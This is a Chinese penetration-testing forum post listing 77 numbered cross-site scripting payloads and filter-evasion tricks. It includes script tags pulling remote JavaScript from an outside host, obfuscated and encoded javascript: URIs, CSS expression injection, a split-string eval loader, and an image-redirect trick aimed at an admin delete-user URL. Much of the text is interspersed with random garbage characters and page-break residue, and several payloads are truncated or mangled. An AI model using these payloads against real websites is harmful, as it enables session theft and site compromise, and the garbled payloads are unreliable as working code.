中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]

---

作者: admin    时间: 2013-4-19 19:22
标题: XSS攻击汇总
貌似关于xss的资料t00ls比较少，看见好东西Copy过来，不知道有木有童鞋需要Mark的。
(1)普通的XSS JavaScript注入
' y& w, s  `8 j, Y7 Z( Q' z3 z7 E; Q<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3)IMG标签无分号无引号
. J5 Y- e5 k- _* ]<IMG SRC=javascript:alert(‘XSS’)>
3 M: c% S  g5 C( U(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
1 l9 S7 p$ I. e" A- |' c, ~(5)HTML编码(必须有分号)
1 h- k( `' g# W; e8 ^  C; ?) e<IMG SRC=javascript:alert(“XSS”)>
(6)修正缺陷IMG标签
# g  M4 J0 C1 R$ ?" |' X3 U& z* y  U<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

; |8 k* W5 M$ A/ ~4 b: A
(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
3 d( T# W* D9 N& M0 j* f% [<IMG SRC=jav..省略..S')>
4 t7 p- P- F- S9 B(10)十六进制编码也是没有分号(计算器)
7 g3 L$ o7 S- B* G/ B  E4 }) B<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
(11)嵌入式标签,将Javascript分开
$ }+ W2 C; H2 Z8 _<IMG SRC=”jav ascript:alert(‘XSS’);”>
(12)嵌入式编码标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(13)嵌入式换行符
: P) w2 x$ C; f<IMG SRC=”jav ascript:alert(‘XSS’);”>
(14)嵌入式回车
5 q: L! d. t' }" M& i<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 m0 e. k( S5 |  c(15)嵌入式多行注入JavaScript,这是XSS极端的例子
5 n# |0 i0 d; N<IMG SRC=”javascript:alert(‘XSS‘)”>
(16)解决限制字符(要求同页面)
<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
* X4 U* J2 z2 r) |# q; u<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
8 t. U7 ?1 p5 R: Q, {- L1 w7 b: j<script>z=z+’ript>”)’</script>
7 g- j3 G3 \8 {) x  Q<script>eval_r(z)</script>
# |+ o- W/ Y! E6 U# {(17)空字符12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
" |& N4 y: j. i5 @(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
6 u4 w2 x# `( M5 Z$ Z  U8 A(19)Spaces和meta前的IMG标签
<IMG SRC=” javascript:alert(‘XSS’);”>
(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
. z# {' x8 M: a(22)Non-alpha-non-digit XSS to 3
, ]; G) x4 N; V$ b: y6 W0 o<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
' K: R- n7 A, ?; E(23)双开括号
" }% k) a6 \& v; G& L$ S  q8 f, h<<SCRIPT>alert(“XSS”);//<</SCRIPT>
(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>
: C$ U- e; e4 x  K0 Q(26)半开的HTML/JavaScript XSS
3 j: ~, a  P/ n8 x) d<IMG SRC=”javascript:alert(‘XSS’)”
(27)双开角括号
<iframe src=http://3w.org/XSS.html <
(28)无单引号 双引号 分号
<SCRIPT>a=/XSS/
# l! F8 x8 x- j" J$ W! Falert(a.source)</SCRIPT>
" H3 M, A* f* o3 W(29)换码过滤的JavaScript
\”;alert(‘XSS’);//
$ E* ~& C: r! u(30)结束Title标签
# a$ o0 F4 S, L: E8 v& s) A</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
(31)Input Image
<INPUT SRC=”javascript:alert(‘XSS’);”>
- }2 q7 J+ u8 p5 _1 `(32)BODY Image
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
- Y" `( H* ~$ R(33)BODY标签
( L/ u" M3 K$ m$ K+ @" K<BODY(‘XSS’)>
(34)IMG Dynsrc
( A( r% S( q2 i$ ]1 S0 f<IMG DYNSRC=”javascript:alert(‘XSS’)”>
(35)IMG Lowsrc
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
(36)BGSOUND
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
(37)STYLE sheet
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
- |- k8 s9 B( A! X" W- U5 n4 A(38)远程样式表
& F- n" d6 J" X' ]<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
: }0 x- E0 n# `* r8 b/ f+ N(39)List-style-image(列表式)
( d7 @( G, ~) u+ V<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
, i) C# N+ ^4 U4 p0 ~8 I(40)IMG VBscript
: W( Q. `7 [- O) }2 H+ a<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
: x/ ]& P) M- e9 |. K. m3 H/ A(41)META链接url
" j7 Q( m. a* o$ Z% ?

<META HTTP-EQUIV=”refresh” CONTENT=”0;
URL=http://;URL=javascript:alert(‘XSS’);”>
3 `6 o2 Z2 o, m( b- M, V# n(42)Iframe
$ Q0 M5 }+ u$ G<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
2 W/ G4 t+ a5 [3 A% T. C(43)Frame
; G5 v5 d0 _9 @& o- e+ A- W" @: c<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
1 F- A( B, a' E; P5 n6 uhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
(44)Table
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
& A& z. I7 ^0 P; X7 M(45)TD
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
9 c* Q) K5 M1 c0 Y(46)DIV background-image
9 T5 v9 u" `5 @- f3 w: h/ o  e7 y<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
8&13&12288&65279)
! ^% q1 l) ?1 x5 c<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
(48)DIV expression
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
" S1 ?8 w0 K/ k$ Z- V, C(49)STYLE属性分拆表达
' O0 y6 q  k2 H6 T9 Z3 Y6 u<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ W; o3 _0 D+ S$ l(50)匿名STYLE(组成:开角号和一个字母开头)
8 e+ `7 N- c: ~+ z+ x! [, @+ E, r<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
(51)STYLE background-image
/ T( g# ?: ]  j! v$ G<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
CLASS=XSS></A>
(52)IMG STYLE方式
exppression(alert(“XSS”))’>
(53)STYLE background
<STYLE><STYLE
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
(54)BASE
<BASE HREF=”javascript:alert(‘XSS’);//”>
0 z' G7 y0 `' X  a5 x1 G; s1 _(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
(56)在flash中使用ActionScrpt可以混进你XSS的代码
0 \* e4 r0 l) ia=”get”;
b=”URL(\”";
c=”javascript:”;
d=”alert(‘XSS’);\”)”;
0 {& `* q) [3 T6 Q  g7 ?, ^$ Z+ }eval_r(a+b+c+d);
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
<HTML xmlns:xss>
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
/ E4 @8 f' {1 a$ s8 W<xss:xss>XSS</xss:xss>
! H. q: {* l* h& F9 K</HTML>
- G" K) F* A2 }4 a3 L# B2 d1 ]  |(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
; C. N9 O+ P! D<SCRIPT SRC=””></SCRIPT>
. y, B6 ^" l) u- b4 Q' [" D(59)IMG嵌入式命令,可执行任意命令
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
) P$ E8 c9 D& M. V9 g% e* Q( D: O0 s(60)IMG嵌入式命令(a.jpg在同服务器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61)绕符号过滤
* `) k! u4 ^- w$ O<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, d6 b* s$ {- w(62)
1 w5 m0 R/ D5 I* |8 Y4 |: a<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
. n3 p3 W. P  x( E+ z(63)
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
% u' d# G: j  {$ v" P6 W4 \3 m3 q/ [- i1 }(64)
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
(65)
8 P7 n! p  I9 t& y<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
(66)12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ {2 J+ U5 P, H+ b/ ]9 S( E2 T- l(67)
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
/ F+ Q) E& A% }6 n</SCRIPT>
(68)URL绕行
9 J7 C6 ~! o1 D9 {$ y<A HREF=”http://127.0.0.1/”>XSS</A>
(69)URL编码
( f: U# \4 L, r0 D3 j2 ?<A HREF=”http://3w.org”>XSS</A>
- s+ J; F. }% T5 h) B6 Z(70)IP十进制
$ S4 a+ K$ p. T. O; ~6 b( s<A HREF=”http://3232235521″>XSS</A>
(71)IP十六进制
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
6 h& x$ H( M7 }% B+ D" h(72)IP八进制
3 h, p: ?0 t1 B<A HREF=”http://0300.0250.0000.0001″>XSS</A>
- _8 ^% I! j, r" C, X(73)混合编码
. d9 {4 K( ?5 `1 k  t1 c' p- a<A HREF=”h
tt p://6 6.000146.0×7.147/”">XSS</A>
(74)节省[http:]
' ?" E3 Q" I2 p2 B1 C- J3 m<A HREF=”//www.google.com/”>XSS</A>
(75)节省[www]
<A HREF=”http://google.com/”>XSS</A>
(76)绝对点绝对DNS
" p" ?2 G5 }$ ^% s  f4 C  t<A HREF=”http://www.google.com./”>XSS</A>
(77)javascript链接
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>

0 X, b# p  j/ A1 k0 f/ G% |原文地址：http://fuzzexp.org/u/0day/?p=14
: L9 S! v, F$ G5 X7 `
) a9 ~6 T$ @2 f% E! H

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2